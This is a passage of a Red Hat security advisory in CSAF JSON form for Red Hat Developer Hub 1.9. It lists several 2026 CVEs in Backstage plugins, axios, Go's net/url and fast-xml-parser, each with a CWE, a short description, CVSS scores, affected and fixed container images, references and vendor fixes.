"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "backstage/backend-defaults: backstage/plugin-scaffolder-backend: backstage/plugin-scaffolder-node: possible symlink path traversal in scaffolder actions"
},
{
"cve": "CVE-2026-25153",
"cwe": {
"id": "CWE-94",
"name": "Improper Control of Generation of Code (\u0027Code Injection\u0027)"
},
"discovery_date": "2026-01-30T22:00:57.084320+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2435576"
}
],
"notes": [
{
"category": "description",
"text": "A code injection flaw has been discovered in the npm @backstage/plugin-techdocs-node library. When TechDocs is configured with `runIn: local`, a malicious actor who can submit or modify a repository\u0027s `mkdocs.yml` file can execute arbitrary Python code on the TechDocs build server via MkDocs hooks configuration.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "@backstage/plugin-techdocs-node: @backstage/plugin-techdocs-node vulnerable to arbitrary code execution via MkDocs hooks",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25153"
},
{
"category": "external",
"summary": "RHBZ#2435576",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2435576"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25153",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25153"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25153",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25153"
},
{
"category": "external",
"summary": "https://github.com/backstage/backstage/security/advisories/GHSA-6jr7-99pf-8vgf",
"url": "https://github.com/backstage/backstage/security/advisories/GHSA-6jr7-99pf-8vgf"
}
],
"release_date": "2026-01-30T21:31:58.870000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-07T13:22:11+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6802"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "@backstage/plugin-techdocs-node: @backstage/plugin-techdocs-node vulnerable to arbitrary code execution via MkDocs hooks"
},
{
"cve": "CVE-2026-25639",
"cwe": {
"id": "CWE-1287",
"name": "Improper Validation of Specified Type of Input"
},
"discovery_date": "2026-02-09T21:00:49.280114+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438237"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "RHBZ#2438237",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438237"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25639",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25639"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57",
"url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases/tag/v1.13.5",
"url": "https://github.com/axios/axios/releases/tag/v1.13.5"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433",
"url": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433"
}
],
"release_date": "2026-02-09T20:11:22.374000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-07T13:22:11+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6802"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig"
},
{
"cve": "CVE-2026-25679",
"cwe": {
"id": "CWE-1286",
"name": "Improper Validation of Syntactic Correctness of Input"
},
"discovery_date": "2026-03-06T22:02:11.567841+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2445356"
}
],
"notes": [
{
"category": "description",
"text": "The Go standard library function net/url.Parse insufficiently validated the host/authority component and accepted some invalid URLs by effectively treating garbage before an IP-literal as ignorable. The function should have rejected this as invalid.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "net/url: Incorrect parsing of IPv6 host literals in net/url",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25679"
},
{
"category": "external",
"summary": "RHBZ#2445356",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445356"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25679",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25679"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679"
},
{
"category": "external",
"summary": "https://go.dev/cl/752180",
"url": "https://go.dev/cl/752180"
},
{
"category": "external",
"summary": "https://go.dev/issue/77578",
"url": "https://go.dev/issue/77578"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk",
"url": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4601",
"url": "https://pkg.go.dev/vuln/GO-2026-4601"
}
],
"release_date": "2026-03-06T21:28:14.211000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-07T13:22:11+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6802"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "net/url: Incorrect parsing of IPv6 host literals in net/url"
},
{
"cve": "CVE-2026-25896",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2026-02-20T22:01:59.622413+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2441501"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in fast-xml-parser. A remote attacker can exploit this vulnerability by providing a specially crafted XML input. The system incorrectly interprets a dot in a DOCTYPE entity name as a regular expression wildcard during processing. This allows the attacker to bypass security measures and inject malicious scripts, resulting in Cross-Site Scripting (XSS) when the parsed output is displayed to users.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "fast-xml-parser: fast-xml-parser: Cross-Site Scripting (XSS) due to improper DOCTYPE entity handling",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw has been assessed as IMPORTANT for Red Hat products. This vulnerability arises when the parsed XML output is subsequently rendered to users which requires the interaction of the user. The impact of this flaw is also limited to the user\u0027s browser context.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25896"
},
{
"category": "external",
"summary": "RHBZ#2441501",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2441501"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25896",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25896"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25896",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25896"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/943ef0eb1b2d3284e72dd74f44a042ee9f07026e",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/943ef0eb1b2d3284e72dd74f44a042ee9f07026e"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/ddcd0acf26ddd682cb0dc15a2bd6aa3b96bb1e69",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/ddcd0acf26ddd682cb0dc15a2bd6aa3b96bb1e69"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.3.5",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.3.5"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-m7jm-9gc2-mpf2",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-m7jm-9gc2-mpf2"
}
],
"release_date": "2026-02-20T20:57:48.074000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-07T13:22:11+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6802"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "fast-xml-parser: fast-xml-parser: Cross-Site Scripting (XSS) due to improper DOCTYPE entity handling"
},
{
"cve": "CVE-2026-26278",
"cwe": {
"id": "CWE-776",
"name": "Improper Restriction of Recursive Entity References in DTDs (\u0027XML Entity Expansion\u0027)"
},
"discovery_date": "2026-02-19T21:03:33.363864+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2441120"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw was found in fast-xml-parser. A remote attacker can exploit this vulnerability by providing a specially crafted, small XML input. This input can force the XML parser to perform an unlimited amount of entity expansion, consuming excessive resources. This can lead to the application freezing for an extended period, resulting in a Denial of Service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "fast-xml-parser: fast-xml-parser: Denial of Service via unlimited XML entity expansion",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-26278"
},
{
"category": "external",
"summary": "RHBZ#2441120",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2441120"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-26278",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26278"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-26278",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26278"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/910dae5be2de2955e968558fadf6e8f74f117a77",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/910dae5be2de2955e968558fadf6e8f74f117a77"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.3.6",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.3.6"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-jmr7-xgp7-cmfj",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-jmr7-xgp7-cmfj"
}
],
"release_date": "2026-02-19T19:40:55.842000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-07T13:22:11+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6802"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "fast-xml-parser: fast-xml-parser: Denial of Service via unlimited XML entity expansion"
},
{
"cve": "CVE-2026-27606",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2026-02-25T04:01:24.449922+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
